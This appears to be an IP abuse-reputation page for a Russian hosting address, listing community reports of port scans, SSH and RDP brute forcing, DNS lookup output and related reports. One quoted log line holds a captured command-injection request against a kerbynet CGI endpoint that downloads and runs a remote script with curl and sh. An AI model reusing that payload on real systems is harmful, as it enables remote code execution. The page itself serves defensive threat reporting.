Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Russian Federation

Internet Service Provider: ComTrade LLC

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:
Type Details Datetime
attackbots
ET CINS Active Threat Intelligence Poor Reputation IP group 31 - port: 500 proto: TCP cat: Misc Attack
2019-12-24 05:10:38
Comments on same subnet:
IP Type Details Datetime
45.136.108.22 attackspambots
45.136.108.22 - - [31/Aug/2020:07:28:26 -0500] "- / HTTP/1.0" 400 219 000 0 0 0 15 282 0 0 0 NONE FIN FIN ERR_INVALID_REQ
2020-09-01 04:38:43
45.136.108.22 attack
Unauthorized connection attempt from IP address 45.136.108.22 on port 993
2020-08-29 02:06:36
45.136.108.24 attackspambots
SSH login attempts.
2020-08-22 23:35:58
45.136.108.22 attackspambots
Fail2Ban Ban Triggered
2020-08-19 09:11:16
45.136.108.65 attack
[14/Aug/2020:05:14:56 -0400] "\x03" Blank UA
2020-08-16 04:36:35
45.136.108.67 attack
Unauthorized connection attempt detected from IP address 45.136.108.67 to port 2261 [T]
2020-08-16 04:36:18
45.136.108.24 attackspam
Unauthorized connection attempt detected from IP address 45.136.108.24 to port 4453 [T]
2020-08-14 02:36:09
45.136.108.65 attackbotsspam
Unauthorized connection attempt detected from IP address 45.136.108.65 to port 968 [T]
2020-08-14 02:12:50
45.136.108.66 attackbotsspam
Unauthorized connection attempt detected from IP address 45.136.108.66 to port 1723 [T]
2020-08-14 02:12:33
45.136.108.68 attack
Unauthorized connection attempt detected from IP address 45.136.108.68 to port 3424 [T]
2020-08-14 02:12:09
45.136.108.22 attackbotsspam
Port scan detected
2020-08-14 01:49:56
45.136.108.67 attackspambots
Unauthorized connection attempt detected from IP address 45.136.108.67 to port 2925 [T]
2020-08-14 01:49:28
45.136.108.62 attack
Unauthorized connection attempt detected from IP address 45.136.108.62 to port 9055 [T]
2020-08-14 01:07:35
45.136.108.80 attackspambots
2020-08-12T12:42:42Z - RDP login failed multiple times. (45.136.108.80)
2020-08-12 22:09:08
45.136.108.18 attack
RDP brute forcing (r)
2020-08-04 21:39:59
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.136.108.162
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 55501
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;45.136.108.162.			IN	A

;; AUTHORITY SECTION:
.			205	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019122300 1800 900 604800 86400

;; Query time: 103 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Dec 23 19:25:28 CST 2019
;; MSG SIZE  rcvd: 118
Host info
Host 162.108.136.45.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 162.108.136.45.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
221.143.48.143 attack
Sep  1 19:40:45 rotator sshd\[16792\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep  1 19:40:48 rotator sshd\[16792\]: Failed password for root from 221.143.48.143 port 33726 ssh2Sep  1 19:44:19 rotator sshd\[16809\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep  1 19:44:19 rotator sshd\[16809\]: Invalid user made from 221.143.48.143Sep  1 19:44:21 rotator sshd\[16809\]: Failed password for invalid user made from 221.143.48.143 port 41260 ssh2Sep  1 19:47:58 rotator sshd\[17571\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep  1 19:47:58 rotator sshd\[17571\]: Invalid user hadoop from 221.143.48.143
...
2020-09-02 04:41:41
167.249.168.131 spambotsattackproxynormal
PAIN DOMINA 
Gmail
YouTube 
Vírus 
17:59
2020-09-02 04:59:30
93.153.173.102 attackbots
Sep  1 13:26:14 shivevps sshd[27182]: Bad protocol version identification '\024' from 93.153.173.102 port 50006
...
2020-09-02 04:54:42
62.234.130.87 attackspam
Brute-force attempt banned
2020-09-02 05:06:44
66.70.142.231 attackbots
Unauthorised connection attempt detected at AUO MAIN. System is sshd. Protected by AUO Stack Web Application Firewall (WAF)
2020-09-02 04:42:30
119.18.157.154 attack
Sep  1 13:26:39 shivevps sshd[27485]: Bad protocol version identification '\024' from 119.18.157.154 port 53440
...
2020-09-02 04:36:38
182.208.252.91 attackbots
Sep  1 14:30:54 web8 sshd\[20912\]: Invalid user oracle from 182.208.252.91
Sep  1 14:30:54 web8 sshd\[20912\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.208.252.91
Sep  1 14:30:56 web8 sshd\[20912\]: Failed password for invalid user oracle from 182.208.252.91 port 40328 ssh2
Sep  1 14:33:54 web8 sshd\[22271\]: Invalid user zy from 182.208.252.91
Sep  1 14:33:54 web8 sshd\[22271\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.208.252.91
2020-09-02 04:49:24
192.241.227.232 attackbots
GPL SNMP public access udp - port: 161 proto: snmp cat: Attempted Information Leakbytes: 85
2020-09-02 04:39:25
73.217.210.236 spambotsattackproxynormal
My comcast router is hacked by a PROXY server
2020-09-02 04:59:29
140.207.81.233 attackspambots
Sep  1 22:36:44 buvik sshd[18154]: Invalid user gmodserver from 140.207.81.233
Sep  1 22:36:44 buvik sshd[18154]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.207.81.233
Sep  1 22:36:46 buvik sshd[18154]: Failed password for invalid user gmodserver from 140.207.81.233 port 55615 ssh2
...
2020-09-02 05:04:42
176.108.27.157 attackspambots
honeypot forum registration (user=Marionbit; email=gerbSorail@gmail.com)
2020-09-02 05:04:19
202.57.40.227 attack
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;" HTTP/1.0
2020-09-02 04:51:28
106.13.128.71 attack
" "
2020-09-02 04:59:04
119.63.138.25 attack
php WP PHPmyadamin ABUSE blocked for 12h
2020-09-02 05:08:33
167.249.168.131 bots
https://youtu.be/OORReN7pQ5M
2020-09-02 05:09:05

Recently Reported IPs

217.249.130.106 156.213.229.209 82.200.30.162 156.198.89.55
45.162.62.94 156.199.51.115 61.161.191.58 116.103.232.158
77.45.157.140 156.207.201.0 197.40.99.245 156.195.75.198
197.40.134.36 208.113.153.233 49.147.119.33 115.79.51.177
41.37.101.38 197.43.203.16 162.241.149.130 156.212.117.216